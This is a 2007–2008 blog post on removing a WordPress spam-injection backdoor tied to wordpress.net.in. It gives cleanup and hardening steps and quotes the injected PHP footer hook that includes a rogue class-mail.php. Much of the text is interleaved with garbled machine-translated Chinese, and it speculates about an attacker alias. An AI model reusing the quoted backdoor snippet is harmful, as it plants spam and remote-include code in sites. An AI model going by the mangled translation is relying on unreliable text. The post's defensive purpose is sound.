How to Remove Wordpress.net.in Spam Injection How to Remove Wordpress.net.in Spam Injection 如何删除垃圾邮件wordpress.net.in注射 如何删除垃圾邮件wordpress.net.in注射液

I found this while browsing WordPress support forum, some of these victims update their default_filters.php and upload class-mail.php inside their WordPress without being aware that it’sa backdoor (wordpress.net.in).我发现，这同时浏览的WordPress支持论坛上，一些这些受害者的更新他们的default_filters.php并上传类mail.php内的WordPress没有意识到这是后门 （ wordpress.net.in ） 。 There is no class-mail.php in WordPress except class-phpmailer.php .是没有阶级mail.php在WordPress除阶级phpmailer.php 。 So don’t get confuse by it.因此，不要混淆它。

Below is a quick workaround on how you can removed the offending goro spamware injection before Google banned you from the internet pipes.下面是一个快速可行就如何您可以拆除违法戈罗 spamware注射液，然后Google禁止您从互联网上水管。

Workaround其他可行方案

• For temporary disable remote include in php.ini settings.暂时停用远端包括在php.ini中设置。

   ;;;;;;;;;;;;;;;;;; ; Fopen wrappers ; ;;;;;;;;;;;;;;;;;;  ; Whether to allow the treatment of URLs (like http:// or ftp://) as files. ;;;;;;;;;;;;;;;;;; ; fopen包装; ;;;;;;;;;;;;;;;;;; ;是否允许治疗的网址（如http://或ftp:// ）的档案。 allow_url_fopen = off allow_url_include = off allow_url_fopen =小康allow_url_include =小康 

• Check your .htaccess for suspicious redirect.检查您的。 htaccess的可疑的重定向。
• Find class-mail.php inside “*/wp-includes/” directory and removed it.找到班主任mail.php内“ * /可湿性粉剂-包括/ ”的目录，并删除它。
• Find the following code inside “*/wp-includes/default_filters.php” and removed it找到以下代码内“ * / wp-includes/default_filters.php ” ，并删除它

   add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775'); function wpc7c16<>b8466d864eeefd20050625c7775() { @include(’./wp-includes/class-mail.php’); if(sizeof($wparr)>0){ echo “!div id=\”goro\”!”; foreach($wparr as $k=>$v){ echo ““.ucwords($v[’key’]).”\n”; if($i  ==$inum) break; } echo “!/div!”.$_footer; } } add_action （ ' wp_footer ' ， ' wpc7c16b8466d864eeefd20050625c7775 ' ） ;功能wpc7c16 < > b8466d864eeefd20050625c7775 （ ） （ @包括（ ' 。 /可湿性粉剂-包括/类mail.php ' ） ;如果（ sizeof （ $ wparr ） > 0 ） （回声“ ！学编号= \ “戈罗\ ” ！ “ ; foreach （ $ wparr元，当K = >元，五） （回声” ， “ 。 ucwords （元五[ '的关键'])." \ n ” ;如果美元（一    = = $ inum ）打破; ）回声“ ！ /学!".$_页脚; ） ） 

• Robots.txt Exclusion robots.txt的排斥

  Optional - Prevent googlebot from indexing the static spam page. 可选 -防止G ooglebot索引静态垃圾邮件的网页。
  Login to Wordpress Admin > Manage > Files > Other Files → Key in “Robots.txt”.登录的WordPress管理>管理>文件>其他文件 →关键在为“ robots.txt ” 。 Add the following code.添加以下代码。

   User-agent: Googlebot Disallow: /*?* Disallow: /*?使用者代理： Googlebot的不允许： / * ？ *不允许： / * ？ 

  Refer robots.txt .指的robots.txt 。

Possible WordPress class (suspicious) files that would be tempered可能的WordPress级（可疑）的档案会锻炼

Md5 checksum the following files, compare it with official versions from WordPress Release Archive . MD5校验和下列文件，比较它与官方版本由WordPress所释放存档 。

• wp-db.php 可湿性粉剂- db.php
• gettext.php gettext.php

The above methods only remove and disabled the spams links, there is no guarantee that it will protected you from future vulnerabilities.上述方法只是删除和禁用垃圾邮件的链接，我们不能保证它会保护你从未来的脆弱性。 Backup (or export your post using WordPress eXtended RSS -WRX) and perform a full upgrade .备份（或出口，您的帖子使用的WordPress扩展RSS的wrx ）和执行完整的升级 。

Dec 13, 2007 2007年12月13日

I just notice this recently.我只是注意到这个最近。 You’ll need to check your site HTTP Header.您需要检查您的网站的HTTP标头。 Most of the hijacked websites doesn’t response with correct HTTP Status Header (400<>500) .大部分被劫持的网站并不反应，以正确的HTTP状态标题（ 400 < > 500 ） 。 My guess is they did this to cloak from being crawl by search engine spiders.我的猜测是，他们这样做，以掩饰从检索搜索引擎Spider 。 If you had cleaned all the infected files and your header doesn’t response correctly get a rookit scanner .如果您已清理所有受感染的文件和您的标题不正确的反应得到rookit的扫描仪 。

Check your website status header, try cloak your browser (UA) as Search Engine Crawler.检查您的网站上的地位，标题，请尝试斗篷您的浏览器（ UA ）的搜索引擎的抓取工具。 The following screenshot will show you how to setup this at web-sniffer.net.以下截图会告诉您如何将安装在这个网络sniffer.net 。

This methods may not work if the cloaking scripts used IP base tracking.这个方法可能无法正常工作，如果伪装的脚本使用的IP相应的跟踪。 So try on different user agent string (ie: inoktomi, askjeeves, ia_archiver).因此，尝试对不同用户代理字符串（即： inoktomi ， askjeeves ， ia_archiver ） 。

Firefox Browser Firefox浏览器

You can also override your useragent string with firefox ↓.您也可以凌驾您的UserAgent和字符串与Firefox ↓ 。

about:config → general.useragent.overide = ‘ ua strings ‘ 约：配置→ general.useragent.overide = ' 尿酸字符串 '

Wordpress.net.in Backdoor wordpress.net.in后门

Extra info 额外的资讯

Dec 14, 2007 2007年12月14日

I did some research at archive.org .我的一些研究在archive.org 。 It seem our wordpress.net.in Seo Spam has been going on since 2005.它似乎是我们的wordpress.net.in徐垃圾邮件已持续了自2005年以来。 The first variant used file_get_contents() PHP functions to retrieve their sources code (A UTF MAP Decoder 1974 Php Class ).第一变用file_get_contents （ ） PHP函数来撷取其来源代码（一个UTF地图解码器， 1974年的PHP类） 。

I also found a signature name alxumuk (at MIT & wordpress.net.in).我也发现了签署：姓名： alxumuk （在麻省理工学院＆ wordpress.net.in ） 。 His first historic test can be root back at *.media.mit.edu/~? server (I hide the userid as it may be “false positive”).他的第一次历史性考验，可以根回*. media.mit.edu / 〜 ？伺服器（隐藏用户名，因为它可能是“假阳性” ） 。 After my first search on google for alxumuk all the results has been scraped out by Google & “Google alert” so there is no references to this query in Google Index.之后，我第一次在Google上搜索alxumuk所有结果已经废弃了由Google ＆ “ Google快讯” ，所以没有提到这个查询在Google索引中。

My query for file_get_contents include require allintext:1974.* (the UTF decode package) and the signature (alxumuk) will return 403 Forbidden .我查询file_get_contents包括要求allintext ： 1974年.* （为UTF解码包）和签名（ alxumuk ）将返回403禁止 。

As Google Advanced Search blocked “the query” this may confirm that 1974.* (UTF decode) is probably the package for reading the bootstrap for wordpress.net.in backdoor (similar case like perl.santy net worm). Google的进阶搜寻封锁“ ，查询： ”这可能是证实， 1974年* （为UTF解码） ，可能是包读引导，为wordpress.net.in后门（类似案件一样， perl.santy净蠕虫） 。

If this is a true Net Worm, I suggest anyone with older versions of Wordpress should removed\ the meta generator tag (Wordpress versions) and disabled XML-RPC(& RSD) for hardening wordpress from remote vectors vulnerabilities.如果这是一个真正的净蠕虫病毒，我建议任何人与较旧版本的WordPress的应取消\中继发电机标记（在WordPress版本）及残疾人士的XML - RPC （ ＆区署）为硬化的WordPress从偏远载体的脆弱性。

Wordpress.net.in Doorway wordpress.net.in门口

Dec 24, 2007 → http://www.wordpress.net.in/mentors/alxumuk/ 2007年12月24日 → http://www.wordpress.net.in/mentors/alxumuk/

Backdoor Files后门档案

inside wp-includes directory.内可湿性粉剂-包括目录。

• compat.php - (replace with latest version) compat.php -（ 替换为最新版本）
• class-mail.php delete阶级mail.php 删除

scan & removes all backdoor files and create a .htaccess file inside wp-includes & wp-content/plugins .扫描＆删除所有后门文件和创建一个。 htaccess的档案内可湿性粉剂-包括 ＆ wp-content/plugins 。 Then add the following code to disabled directory listing (prevent informations leak & Directory search index).然后将以下代码添加到残疾人士的目录列表（防止信息泄漏及目录搜寻索引） 。

 Options -Indexes选择指标 

Wordpress.net.in New Partner wordpress.net.in新的合作伙伴

Feb 23th 2008 , We found a similar signature like wordpress.net.in at qwetro.com (germany). 2008年2月23日 ，我们发现了类似的签名一样， wordpress.net.in在qwetro.com （德国） 。 Probably from the same attacker with different agenda.可能是来自同一攻击者与不同的议程。

Related Posts相关文章

• Bluehost HostMonster CEO’s Blog hacked (wordpress.net.in) bluehost hostmonster行政总裁的博客砍死（ wordpress.net.in ）
• Matt Heaton Bluehost Hostmonster CEO’s Hacked Again - Strike II 马特希亚bluehost hostmonster行政总裁的砍死再次-罢工二

External Links外部链接

• Websniffer View HTTP Request and Response Header websniffer查看HTTP请求和响应报头
• Wordpress Support Forum 在WordPress支持论坛
• National Vulnerability Database Wordpress 2.0 > 2.0.6 国家脆弱性数据库的WordPress 2.0 > 2.0.6

Short URL简短网址

Bookmarks书签

• Share This 分享此